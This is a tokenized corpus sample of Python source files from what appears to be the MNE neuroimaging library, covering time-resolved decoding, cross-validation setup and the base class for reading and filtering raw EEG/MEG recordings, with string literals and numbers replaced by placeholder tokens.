label = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> return plot_gat_times ( self , train_time = '<STR_LIT>' , title = title , <EOL> xmin = xmin , xmax = xmax , <EOL> ymin = ymin , ymax = ymax , ax = ax , show = show , <EOL> color = color , xlabel = xlabel , ylabel = ylabel , <EOL> legend = legend , chance = chance , label = label ) <EOL> def plot_times ( self , train_time , title = None , xmin = None , xmax = None , <EOL> ymin = None , ymax = None , ax = None , show = True , color = None , <EOL> xlabel = True , ylabel = True , legend = True , chance = True , <EOL> label = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> if not np . array ( train_time ) . dtype is np . dtype ( '<STR_LIT:float>' ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' % type ( train_time ) ) <EOL> return plot_gat_times ( self , train_time = train_time , title = title , <EOL> xmin = xmin , xmax = xmax , <EOL> ymin = ymin , ymax = ymax , ax = ax , show = show , <EOL> color = color , xlabel = xlabel , ylabel = ylabel , <EOL> legend = legend , chance = chance , label = label ) <EOL> class TimeDecoding ( _GeneralizationAcrossTime ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , picks = None , cv = <NUM_LIT:5> , clf = None , times = None , <EOL> predict_method = '<STR_LIT>' , predict_mode = '<STR_LIT>' , <EOL> scorer = None , n_jobs = <NUM_LIT:1> ) : <EOL> super ( TimeDecoding , self ) . __init__ ( picks = picks , cv = cv , clf = clf , <EOL> train_times = times , <EOL> test_times = '<STR_LIT>' , <EOL> predict_method = predict_method , <EOL> predict_mode = predict_mode , <EOL> scorer = scorer , n_jobs = n_jobs ) <EOL> self . _clean_times ( ) <EOL> def __repr__ ( self ) : <EOL> s = '<STR_LIT>' <EOL> if hasattr ( self , "<STR_LIT>" ) : <EOL> s += "<STR_LIT>" % ( <EOL> self . times_ . get ( '<STR_LIT:start>' , np . nan ) , <EOL> self . times_ . get ( '<STR_LIT>' , np . nan ) ) <EOL> else : <EOL> s += '<STR_LIT>' <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> s += ( "<STR_LIT>" % len ( self . y_pred_ [ <NUM_LIT:0> ] ) ) <EOL> else : <EOL> s += "<STR_LIT>" <EOL> if hasattr ( self , "<STR_LIT>" ) and hasattr ( self , '<STR_LIT>' ) : <EOL> s += '<STR_LIT>' <EOL> else : <EOL> s += '<STR_LIT:U+002CU+0020>' <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> s += "<STR_LIT>" <EOL> if callable ( self . scorer_ ) : <EOL> s += "<STR_LIT>" % ( self . scorer_ . __name__ ) <EOL> else : <EOL> s += "<STR_LIT>" <EOL> return "<STR_LIT>" % s <EOL> def fit ( self , epochs , y = None ) : <EOL> """<STR_LIT>""" <EOL> self . _prep_times ( ) <EOL> super ( TimeDecoding , self ) . fit ( epochs , y = y ) <EOL> self . _clean_times ( ) <EOL> return self <EOL> def predict ( self , epochs ) : <EOL> """<STR_LIT>""" <EOL> self . _prep_times ( ) <EOL> super ( TimeDecoding , self ) . predict ( epochs ) <EOL> self . _clean_times ( ) <EOL> return self . y_pred_ <EOL> def score ( self , epochs = None , y = None ) : <EOL> """<STR_LIT>""" <EOL> if epochs is not None : <EOL> self . predict ( epochs ) <EOL> else : <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . _prep_times ( ) <EOL> super ( TimeDecoding , self ) . score ( epochs = None , y = y ) <EOL> self . _clean_times ( ) <EOL> return self . scores_ <EOL> def plot ( self , title = None , xmin = None , xmax = None , ymin = None , ymax = None , <EOL> ax = None , show = True , color = None , xlabel = True , ylabel = True , <EOL> legend = True , chance = True , label = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> self . _prep_times ( ) <EOL> fig = plot_gat_times ( self , train_time = '<STR_LIT>' , title = title , <EOL> xmin = xmin , xmax = xmax , ymin = ymin , ymax = ymax , ax = ax , <EOL> show = show , color = color , xlabel = xlabel , <EOL> ylabel = ylabel , legend = legend , chance = chance , <EOL> label = label ) <EOL> self . _clean_times ( ) <EOL> return fig <EOL> def _prep_times ( self ) : <EOL> """<STR_LIT>""" <EOL> self . test_times = '<STR_LIT>' <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> self . train_times = self . times <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> self . train_times_ = self . times_ <EOL> self . test_times_ = _DecodingTime ( ) <EOL> self . test_times_ [ '<STR_LIT>' ] = [ [ slic ] for slic in <EOL> self . train_times_ [ '<STR_LIT>' ] ] <EOL> self . test_times_ [ '<STR_LIT>' ] = [ [ tim ] for tim in <EOL> self . train_times_ [ '<STR_LIT>' ] ] <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> self . scores_ = [ [ score ] for score in self . scores_ ] <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> self . y_pred_ = [ [ y_pred ] for y_pred in self . y_pred_ ] <EOL> def _clean_times ( self ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> self . times = self . train_times <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> self . times_ = self . train_times_ <EOL> for attr in [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] : <EOL> if hasattr ( self , attr ) : <EOL> delattr ( self , attr ) <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> self . y_pred_ = [ y_pred [ <NUM_LIT:0> ] for y_pred in self . y_pred_ ] <EOL> if hasattr ( self , '<STR_LIT>' ) : <EOL> self . scores_ = [ score [ <NUM_LIT:0> ] for score in self . scores_ ] <EOL> def _chunk_data ( X , slices ) : <EOL> """<STR_LIT>""" <EOL> slices = [ sl for sl in slices if len ( sl ) ] <EOL> selected_times = np . hstack ( [ np . ravel ( sl ) for sl in slices ] ) <EOL> start = np . min ( selected_times ) <EOL> stop = np . max ( selected_times ) + <NUM_LIT:1> <EOL> slices_chunk = [ sl - start for sl in slices ] <EOL> X_chunk = X [ : , : , start : stop ] <EOL> return X_chunk , slices_chunk <EOL> def _set_cv ( cv , clf = None , X = None , y = None ) : <EOL> from sklearn . base import is_classifier <EOL> if check_version ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> from sklearn . model_selection import ( check_cv , StratifiedKFold , KFold ) <EOL> if isinstance ( cv , ( int , np . int ) ) : <EOL> XFold = StratifiedKFold if is_classifier ( clf ) else KFold <EOL> cv = XFold ( n_folds = cv ) <EOL> cv = check_cv ( cv = cv , y = y , classifier = is_classifier ( clf ) ) <EOL> else : <EOL> from sklearn . cross_validation import ( check_cv , StratifiedKFold , KFold ) <EOL> if isinstance ( cv , ( int , np . int ) ) : <EOL> if is_classifier ( clf ) : <EOL> cv = StratifiedKFold ( y = y , n_folds = cv ) <EOL> else : <EOL> cv = KFold ( n = len ( y ) , n_folds = cv ) <EOL> cv = check_cv ( cv = cv , X = X , y = y , classifier = is_classifier ( clf ) ) <EOL> if hasattr ( cv , '<STR_LIT>' ) : <EOL> cv_splits = [ ( train , test ) for train , test in <EOL> cv . split ( X = np . zeros_like ( y ) , y = y ) ] <EOL> else : <EOL> cv_splits = [ ( train , test ) for train , test in cv ] <EOL> if not np . all ( [ len ( train ) for train , _ in cv_splits ] ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> return cv , cv_splits </s>
<s> """<STR_LIT>""" <EOL> def _check_backend ( ) : <EOL> from . . utils import _check_pyface_backend <EOL> try : <EOL> from pyface . api import warning <EOL> except ImportError : <EOL> warning = None <EOL> backend , status = _check_pyface_backend ( ) <EOL> if status == <NUM_LIT:0> : <EOL> return <EOL> elif status == <NUM_LIT:1> : <EOL> msg = ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % backend ) <EOL> elif status == <NUM_LIT:2> : <EOL> msg = ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % backend ) <EOL> warning ( None , msg , "<STR_LIT>" ) </s>
<s> import copy <EOL> from copy import deepcopy <EOL> import os <EOL> import os . path as op <EOL> import numpy as np <EOL> from scipy import linalg <EOL> from . constants import FIFF <EOL> from . pick import pick_types , channel_type , pick_channels , pick_info <EOL> from . pick import _pick_data_channels , _pick_data_or_ica <EOL> from . meas_info import write_meas_info <EOL> from . proj import setup_proj , activate_proj , _proj_equal , ProjMixin <EOL> from . . channels . channels import ( ContainsMixin , UpdateChannelsMixin , <EOL> SetChannelsMixin , InterpolationMixin ) <EOL> from . . channels . montage import read_montage , _set_montage , Montage <EOL> from . compensator import set_current_comp <EOL> from . write import ( start_file , end_file , start_block , end_block , <EOL> write_dau_pack16 , write_float , write_double , <EOL> write_complex64 , write_complex128 , write_int , <EOL> write_id , write_string , write_name_list , _get_split_size ) <EOL> from . . filter import ( low_pass_filter , high_pass_filter , band_pass_filter , <EOL> notch_filter , band_stop_filter , resample , <EOL> _resample_stim_channels ) <EOL> from . . fixes import in1d <EOL> from . . parallel import parallel_func <EOL> from . . utils import ( _check_fname , _check_pandas_installed , <EOL> _check_pandas_index_arguments , _check_copy_dep , <EOL> check_fname , _get_stim_channel , object_hash , <EOL> logger , verbose , _time_mask , warn , deprecated ) <EOL> from . . viz import plot_raw , plot_raw_psd , plot_raw_psd_topo <EOL> from . . defaults import _handle_default <EOL> from . . externals . six import string_types <EOL> from . . event import find_events , concatenate_events <EOL> from . . annotations import _combine_annotations , _onset_to_seconds <EOL> class ToDataFrameMixin ( object ) : <EOL> """<STR_LIT>""" <EOL> def _get_check_picks ( self , picks , picks_check ) : <EOL> if picks is None : <EOL> picks = list ( range ( self . info [ '<STR_LIT>' ] ) ) <EOL> else : <EOL> if not in1d ( picks , np . arange ( len ( picks_check ) ) ) . all ( ) : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return picks <EOL> def to_data_frame ( self , picks = None , index = None , scale_time = <NUM_LIT> , <EOL> scalings = None , copy = True , start = None , stop = None ) : <EOL> """<STR_LIT>""" <EOL> from . . epochs import _BaseEpochs <EOL> from . . evoked import Evoked <EOL> from . . source_estimate import _BaseSourceEstimate <EOL> pd = _check_pandas_installed ( ) <EOL> mindex = list ( ) <EOL> if isinstance ( self , _BaseSourceEstimate ) : <EOL> if self . subject is None : <EOL> default_index = [ '<STR_LIT:time>' ] <EOL> else : <EOL> default_index = [ '<STR_LIT>' , '<STR_LIT:time>' ] <EOL> data = self . data . T <EOL> times = self . times <EOL> shape = data . shape <EOL> mindex . append ( ( '<STR_LIT>' , np . repeat ( self . subject , shape [ <NUM_LIT:0> ] ) ) ) <EOL> if isinstance ( self . vertices , list ) : <EOL> col_names = [ i for e in [ <EOL> [ '<STR_LIT>' . format ( '<STR_LIT>' if ii < <NUM_LIT:1> else '<STR_LIT>' , vert ) <EOL> for vert in vertno ] <EOL> for ii , vertno in enumerate ( self . vertices ) ] <EOL> for i in e ] <EOL> else : <EOL> col_names = [ '<STR_LIT>' . format ( vert ) for vert in self . vertices ] <EOL> elif isinstance ( self , ( _BaseEpochs , _BaseRaw , Evoked ) ) : <EOL> picks = self . _get_check_picks ( picks , self . ch_names ) <EOL> if isinstance ( self , _BaseEpochs ) : <EOL> default_index = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:time>' ] <EOL> data = self . get_data ( ) [ : , picks , : ] <EOL> times = self . times <EOL> n_epochs , n_picks , n_times = data . shape <EOL> data = np . hstack ( data ) . T <EOL> times = np . tile ( times , n_epochs ) <EOL> id_swapped = dict ( ( v , k ) for k , v in self . event_id . items ( ) ) <EOL> names = [ id_swapped [ k ] for k in self . events [ : , <NUM_LIT:2> ] ] <EOL> mindex . append ( ( '<STR_LIT>' , np . repeat ( names , n_times ) ) ) <EOL> mindex . append ( ( '<STR_LIT>' , <EOL> np . repeat ( np . arange ( n_epochs ) , n_times ) ) ) <EOL> col_names = [ self . ch_names [ k ] for k in picks ] <EOL> elif isinstance ( self , ( _BaseRaw , Evoked ) ) : <EOL> default_index = [ '<STR_LIT:time>' ] <EOL> if isinstance ( self , _BaseRaw ) : <EOL> data , times = self [ picks , start : stop ] <EOL> elif isinstance ( self , Evoked ) : <EOL> data = self . data [ picks , : ] <EOL> times = self . times <EOL> n_picks , n_times = data . shape <EOL> data = data . T <EOL> col_names = [ self . ch_names [ k ] for k in picks ] <EOL> types = [ channel_type ( self . info , idx ) for idx in picks ] <EOL> n_channel_types = <NUM_LIT:0> <EOL> ch_types_used = [ ] <EOL> scalings = _handle_default ( '<STR_LIT>' , scalings ) <EOL> for t in scalings . keys ( ) : <EOL> if t in types : <EOL> n_channel_types += <NUM_LIT:1> <EOL> ch_types_used . append ( t ) <EOL> for t in ch_types_used : <EOL> scaling = scalings [ t ] <EOL> idx = [ picks [ i ] for i in range ( len ( picks ) ) if types [ i ] == t ] <EOL> if len ( idx ) > <NUM_LIT:0> : <EOL> data [ : , idx ] *= scaling <EOL> else : <EOL> raise NameError ( '<STR_LIT>' + <EOL> '<STR_LIT>' . format ( type ( self ) ) ) <EOL> times = np . round ( times * scale_time ) <EOL> mindex . append ( ( '<STR_LIT:time>' , times ) ) <EOL> if index is not None : <EOL> _check_pandas_index_arguments ( index , default_index ) <EOL> else : <EOL> index = default_index <EOL> if copy is True : <EOL> data = data . copy ( ) <EOL> assert all ( len ( mdx ) == len ( mindex [ <NUM_LIT:0> ] ) for mdx in mindex ) <EOL> df = pd . DataFrame ( data , columns = col_names ) <EOL> for i , ( k , v ) in enumerate ( mindex ) : <EOL> df . insert ( i , k , v ) <EOL> if index is not None : <EOL> if '<STR_LIT:time>' in index : <EOL> logger . info ( '<STR_LIT>' ) <EOL> df [ '<STR_LIT:time>' ] = df [ '<STR_LIT:time>' ] . astype ( np . int64 ) <EOL> df . set_index ( index , inplace = True ) <EOL> if all ( i in default_index for i in index ) : <EOL> df . columns . name = '<STR_LIT>' <EOL> return df <EOL> class TimeMixin ( object ) : <EOL> """<STR_LIT>""" <EOL> def time_as_index ( self , times , use_rounding = False ) : <EOL> """<STR_LIT>""" <EOL> from . . source_estimate import _BaseSourceEstimate <EOL> if isinstance ( self , _BaseSourceEstimate ) : <EOL> sfreq = <NUM_LIT:1.> / self . tstep <EOL> else : <EOL> sfreq = self . info [ '<STR_LIT>' ] <EOL> index = ( np . atleast_1d ( times ) - self . times [ <NUM_LIT:0> ] ) * sfreq <EOL> if use_rounding : <EOL> index = np . round ( index ) <EOL> return index . astype ( int ) <EOL> def _check_fun ( fun , d , * args , ** kwargs ) : <EOL> want_shape = d . shape <EOL> d = fun ( d , * args , ** kwargs ) <EOL> if not isinstance ( d , np . ndarray ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> if d . shape != want_shape : <EOL> raise ValueError ( '<STR_LIT>' <EOL> % ( want_shape , d . shape ) ) <EOL> return d <EOL> class _BaseRaw ( ProjMixin , ContainsMixin , UpdateChannelsMixin , <EOL> SetChannelsMixin , InterpolationMixin , ToDataFrameMixin , <EOL> TimeMixin ) : <EOL> """<STR_LIT>""" <EOL> @ verbose <EOL> def __init__ ( self , info , preload = False , <EOL> first_samps = ( <NUM_LIT:0> , ) , last_samps = None , <EOL> filenames = ( None , ) , raw_extras = ( None , ) , <EOL> comp = None , orig_comp_grade = None , orig_format = '<STR_LIT>' , <EOL> dtype = np . float64 , verbose = None ) : <EOL> if isinstance ( preload , np . ndarray ) : <EOL> if preload . dtype not in ( np . float64 , np . complex128 ) : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' % preload . dtype ) <EOL> if preload . dtype != dtype : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> self . _data = preload <EOL> self . preload = True <EOL> assert len ( first_samps ) == <NUM_LIT:1> <EOL> last_samps = [ first_samps [ <NUM_LIT:0> ] + self . _data . shape [ <NUM_LIT:1> ] - <NUM_LIT:1> ] <EOL> load_from_disk = False <EOL> else : <EOL> if last_samps is None : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if preload is False : <EOL> self . preload = False <EOL> load_from_disk = False <EOL> elif preload is not True and not isinstance ( preload , string_types ) : <EOL> raise ValueError ( '<STR_LIT>' % preload ) <EOL> else : <EOL> load_from_disk = True <EOL> self . _last_samps = np . array ( last_samps ) <EOL> self . _first_samps = np . array ( first_samps ) <EOL> info . _check_consistency ( ) <EOL> self . info = info <EOL> if info . get ( '<STR_LIT>' , None ) is None : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> cals = np . empty ( info [ '<STR_LIT>' ] ) <EOL> for k in range ( info [ '<STR_LIT>' ] ) : <EOL> cals [ k ] = info [ '<STR_LIT>' ] [ k ] [ '<STR_LIT>' ] * info [ '<STR_LIT>' ] [ k ] [ '<STR_LIT>' ] <EOL> self . verbose = verbose <EOL> self . _cals = cals <EOL> self . _raw_extras = list ( raw_extras ) <EOL> self . comp = comp <EOL> self . _orig_comp_grade = orig_comp_grade <EOL> self . _filenames = list ( filenames ) <EOL> self . orig_format = orig_format <EOL> self . _projectors = list ( ) <EOL> self . _projector = None <EOL> self . _dtype_ = dtype <EOL> self . annotations = None <EOL> self . _update_times ( ) <EOL> if load_from_disk : <EOL> self . _preload_data ( preload ) <EOL> @ property <EOL> def _dtype ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _dtype_ <EOL> def _read_segment ( self , start = <NUM_LIT:0> , stop = None , sel = None , data_buffer = None , <EOL> projector = None , verbose = None ) : <EOL> """<STR_LIT>""" <EOL> start = int ( start ) <EOL> stop = self . n_times if stop is None else min ( [ int ( stop ) , self . n_times ] ) <EOL> if start >= stop : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> n_sel_channels = self . info [ '<STR_LIT>' ] if sel is None else len ( sel ) <EOL> if sel is not None and len ( sel ) > <NUM_LIT:1> and np . all ( np . diff ( sel ) == <NUM_LIT:1> ) : <EOL> sel = slice ( sel [ <NUM_LIT:0> ] , sel [ - <NUM_LIT:1> ] + <NUM_LIT:1> ) <EOL> idx = slice ( None , None , None ) if sel is None else sel <EOL> data_shape = ( n_sel_channels , stop - start ) <EOL> dtype = self . _dtype <EOL> if isinstance ( data_buffer , np . ndarray ) : <EOL> if data_buffer . shape != data_shape : <EOL> raise ValueError ( '<STR_LIT>' <EOL> % ( data_buffer . shape , data_shape ) ) <EOL> data = data_buffer <EOL> elif isinstance ( data_buffer , string_types ) : <EOL> data = np . memmap ( data_buffer , mode = '<STR_LIT>' , <EOL> dtype = dtype , shape = data_shape ) <EOL> else : <EOL> data = np . zeros ( data_shape , dtype = dtype ) <EOL> cumul_lens = np . concatenate ( ( [ <NUM_LIT:0> ] , np . array ( self . _raw_lengths , <EOL> dtype = '<STR_LIT:int>' ) ) ) <EOL> cumul_lens = np . cumsum ( cumul_lens ) <EOL> files_used = np . logical_and ( np . less ( start , cumul_lens [ <NUM_LIT:1> : ] ) , <EOL> np . greater_equal ( stop - <NUM_LIT:1> , <EOL> cumul_lens [ : - <NUM_LIT:1> ] ) ) <EOL> cals = self . _cals . ravel ( ) [ np . newaxis , : ] <EOL> if self . comp is not None : <EOL> if projector is not None : <EOL> mult = self . comp * cals <EOL> mult = np . dot ( projector [ idx ] , mult ) <EOL> else : <EOL> mult = self . comp [ idx ] * cals <EOL> elif projector is not None : <EOL> mult = projector [ idx ] * cals <EOL> else : <EOL> mult = None <EOL> cals = cals . T [ idx ] <EOL> offset = <NUM_LIT:0> <EOL> for fi in np . nonzero ( files_used ) [ <NUM_LIT:0> ] : <EOL> start_file = self . _first_samps [ fi ] <EOL> if offset == <NUM_LIT:0> : <EOL> start_file += start - cumul_lens [ fi ] <EOL> stop_file = np . min ( [ stop - cumul_lens [ fi ] + self . _first_samps [ fi ] , <EOL> self . _last_samps [ fi ] + <NUM_LIT:1> ] ) <EOL> if start_file < self . _first_samps [ fi ] or stop_file < start_file : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> n_read = stop_file - start_file <EOL> this_sl = slice ( offset , offset + n_read ) <EOL> self . _read_segment_file ( data [ : , this_sl ] , idx , fi , <EOL> int ( start_file ) , int ( stop_file ) , <EOL> cals , mult ) <EOL> offset += n_read <EOL> return data <EOL> def _read_segment_file ( self , data , idx , fi , start , stop , cals , mult ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError <EOL> def _check_bad_segment ( self , start , stop , picks , <EOL> reject_by_annotation = False ) : <EOL> """<STR_LIT>""" <EOL> if start < <NUM_LIT:0> : <EOL> return None <EOL> if reject_by_annotation and self . annotations is not None : <EOL> annot = self . annotations <EOL> sfreq = self . info [ '<STR_LIT>' ] <EOL> onset = _onset_to_seconds ( self , annot . onset ) <EOL> overlaps = np . where ( onset < stop / sfreq ) <EOL> overlaps = np . where ( onset [ overlaps ] + annot . duration [ overlaps ] > <EOL> start / sfreq ) <EOL> for descr in annot . description [ overlaps ] : <EOL> if descr . lower ( ) . startswith ( '<STR_LIT>' ) : <EOL> return descr <EOL> return self [ picks , start : stop ] [ <NUM_LIT:0> ] <EOL> @ verbose <EOL> def load_data ( self , verbose = None ) : <EOL> """<STR_LIT>""" <EOL> if not self . preload : <EOL> self . _preload_data ( True ) <EOL> return self <EOL> @ verbose <EOL> def _preload_data ( self , preload , verbose = None ) : <EOL> """<STR_LIT>""" <EOL> data_buffer = preload if isinstance ( preload , ( string_types , <EOL> np . ndarray ) ) else None <EOL> logger . info ( '<STR_LIT>' % <EOL> ( <NUM_LIT:0> , len ( self . times ) - <NUM_LIT:1> , <NUM_LIT:0.> , self . times [ - <NUM_LIT:1> ] ) ) <EOL> self . _data = self . _read_segment ( data_buffer = data_buffer ) <EOL> assert len ( self . _data ) == self . info [ '<STR_LIT>' ] <EOL> self . preload = True <EOL> self . close ( ) <EOL> def _update_times ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _times = np . arange ( self . n_times ) / float ( self . info [ '<STR_LIT>' ] ) <EOL> self . _times . flags . writeable = False <EOL> @ property <EOL> def first_samp ( self ) : <EOL> return self . _first_samps [ <NUM_LIT:0> ] <EOL> @ property <EOL> def last_samp ( self ) : <EOL> return self . first_samp + sum ( self . _raw_lengths ) - <NUM_LIT:1> <EOL> @ property <EOL> def _raw_lengths ( self ) : <EOL> return [ l - f + <NUM_LIT:1> for f , l in zip ( self . _first_samps , self . _last_samps ) ] <EOL> def __del__ ( self ) : <EOL> if hasattr ( self , '<STR_LIT>' ) and hasattr ( self . _data , '<STR_LIT:filename>' ) : <EOL> filename = self . _data . filename <EOL> del self . _data <EOL> try : <EOL> os . remove ( filename ) <EOL> except OSError : <EOL> pass <EOL> def __enter__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return self <EOL> def __exit__ ( self , exception_type , exception_val , trace ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> self . close ( ) <EOL> except : <EOL> return exception_type , exception_val , trace <EOL> def __hash__ ( self ) : <EOL> if not self . preload : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> return object_hash ( dict ( info = self . info , data = self . _data ) ) <EOL> def _parse_get_set_params ( self , item ) : <EOL> if not isinstance ( item , tuple ) : <EOL> item = ( item , slice ( None , None , None ) ) <EOL> if len ( item ) != <NUM_LIT:2> : <EOL> raise RuntimeError ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if isinstance ( item [ <NUM_LIT:0> ] , slice ) : <EOL> start = item [ <NUM_LIT:0> ] . start if item [ <NUM_LIT:0> ] . start is not None else <NUM_LIT:0> <EOL> nchan = self . info [ '<STR_LIT>' ] <EOL> if start < <NUM_LIT:0> : <EOL> start += nchan <EOL> if start < <NUM_LIT:0> : <EOL> raise ValueError ( '<STR_LIT>' % nchan ) <EOL> stop = item [ <NUM_LIT:0> ] . stop if item [ <NUM_LIT:0> ] . stop is not None else nchan <EOL> step = item [ <NUM_LIT:0> ] . step if item [ <NUM_LIT:0> ] . step is not None else <NUM_LIT:1> <EOL> sel = list ( range ( start , stop , step ) ) <EOL> else : <EOL> sel = item [ <NUM_LIT:0> ] <EOL> if isinstance ( item [ <NUM_LIT:1> ] , slice ) : <EOL> time_slice = item [ <NUM_LIT:1> ] <EOL> start , stop , step = ( time_slice . start , time_slice . stop , <EOL> time_slice . step ) <EOL> else : <EOL> item1 = item [ <NUM_LIT:1> ] <EOL> if np . array ( item [ <NUM_LIT:1> ] ) . dtype . kind == '<STR_LIT:i>' : <EOL> item1 = int ( item1 ) <EOL> if isinstance ( item1 , ( int , np . integer ) ) : <EOL> start , stop , step = item1 , item1 + <NUM_LIT:1> , <NUM_LIT:1> <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if start is None : <EOL> start = <NUM_LIT:0> <EOL> if ( step is not None ) and ( step is not <NUM_LIT:1> ) : <EOL> raise ValueError ( '<STR_LIT>' % step ) <EOL> if isinstance ( sel , ( int , np . integer ) ) : <EOL> sel = np . array ( [ sel ] ) <EOL> if sel is not None and len ( sel ) == <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> return sel , start , stop <EOL> def __getitem__ ( self , item ) : <EOL> """<STR_LIT>""" <EOL> sel , start , stop = self . _parse_get_set_params ( item ) <EOL> if self . preload : <EOL> data = self . _data [ sel , start : stop ] <EOL> else : <EOL> data = self . _read_segment ( start = start , stop = stop , sel = sel , <EOL> projector = self . _projector , <EOL> verbose = self . verbose ) <EOL> times = self . times [ start : stop ] <EOL> return data , times <EOL> def __setitem__ ( self , item , value ) : <EOL> """<STR_LIT>""" <EOL> _check_preload ( self , '<STR_LIT>' ) <EOL> sel , start , stop = self . _parse_get_set_params ( item ) <EOL> self . _data [ sel , start : stop ] = value <EOL> def anonymize ( self ) : <EOL> """<STR_LIT>""" <EOL> self . info . _anonymize ( ) <EOL> return self <EOL> @ verbose <EOL> def apply_function ( self , fun , picks , dtype , n_jobs , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> _check_preload ( self , '<STR_LIT>' ) <EOL> if picks is None : <EOL> picks = _pick_data_channels ( self . info , exclude = [ ] , <EOL> with_ref_meg = False ) <EOL> if not callable ( fun ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> data_in = self . _data <EOL> if dtype is not None and dtype != self . _data . dtype : <EOL> self . _data = self . _data . astype ( dtype ) <EOL> if n_jobs == <NUM_LIT:1> : <EOL> for idx in picks : <EOL> self . _data [ idx , : ] = _check_fun ( fun , data_in [ idx , : ] , <EOL> * args , ** kwargs ) <EOL> else : <EOL> parallel , p_fun , _ = parallel_func ( _check_fun , n_jobs ) <EOL> data_picks_new = parallel ( p_fun ( fun , data_in [ p ] , * args , ** kwargs ) <EOL> for p in picks ) <EOL> for pp , p in enumerate ( picks ) : <EOL> self . _data [ p , : ] = data_picks_new [ pp ] <EOL> @ verbose <EOL> def apply_hilbert ( self , picks , envelope = False , n_jobs = <NUM_LIT:1> , n_fft = None , <EOL> verbose = None ) : <EOL> """<STR_LIT>""" <EOL> n_fft = self . n_times if n_fft is None else n_fft <EOL> if n_fft < self . n_times : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if envelope is True : <EOL> self . apply_function ( _my_hilbert , picks , None , n_jobs , n_fft , <EOL> envelope = envelope ) <EOL> else : <EOL> self . apply_function ( _my_hilbert , picks , np . complex64 , n_jobs , <EOL> n_fft , envelope = envelope ) <EOL> @ verbose <EOL> def filter ( self , l_freq , h_freq , picks = None , filter_length = '<STR_LIT>' , <EOL> l_trans_bandwidth = <NUM_LIT:0.5> , h_trans_bandwidth = <NUM_LIT:0.5> , n_jobs = <NUM_LIT:1> , <EOL> method = '<STR_LIT>' , iir_params = None , verbose = None ) : <EOL> """<STR_LIT>""" <EOL> fs = float ( self . info [ '<STR_LIT>' ] ) <EOL> if l_freq == <NUM_LIT:0> : <EOL> l_freq = None <EOL> if h_freq is not None and h_freq > ( fs / <NUM_LIT> ) : <EOL> h_freq = None <EOL> if l_freq is not None and not isinstance ( l_freq , float ) : <EOL> l_freq = float ( l_freq ) <EOL> if h_freq is not None and not isinstance ( h_freq , float ) : <EOL> h_freq = float ( h_freq ) <EOL> _check_preload ( self , '<STR_LIT>' ) <EOL> if picks is None : <EOL> picks = _pick_data_or_ica ( self . info ) <EOL> if len ( picks ) < <NUM_LIT:1> : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if h_freq is not None : <EOL> if ( l_freq is None or l_freq < h_freq ) and ( self . info [ "<STR_LIT>" ] is None or <EOL> h_freq < self . info [ '<STR_LIT>' ] ) : <EOL> self . info [ '<STR_LIT>' ] = h_freq <EOL> if l_freq is not None : <EOL> if ( h_freq is None or l_freq < h_freq ) and ( self . info [ "<STR_LIT>" ] is None or <EOL> l_freq > self . info [ '<STR_LIT>' ] ) : <EOL> self . info [ '<STR_LIT>' ] = l_freq <EOL> else : <EOL> if h_freq is not None or l_freq is not None : <EOL> logger . info ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if l_freq is None and h_freq is not None : <EOL> logger . info ( '<STR_LIT>' % h_freq ) <EOL> low_pass_filter ( self . _data , fs , h_freq , <EOL> filter_length = filter_length , <EOL> trans_bandwidth = h_trans_bandwidth , method = method , <EOL> iir_params = iir_params , picks = picks , n_jobs = n_jobs , <EOL> copy = False ) <EOL> if l_freq is not None and h_freq is None : <EOL> logger . info ( '<STR_LIT>' % l_freq ) <EOL> high_pass_filter ( self . _data , fs , l_freq , <EOL> filter_length = filter_length , <EOL> trans_bandwidth = l_trans_bandwidth , method = method , <EOL> iir_params = iir_params , picks = picks , n_jobs = 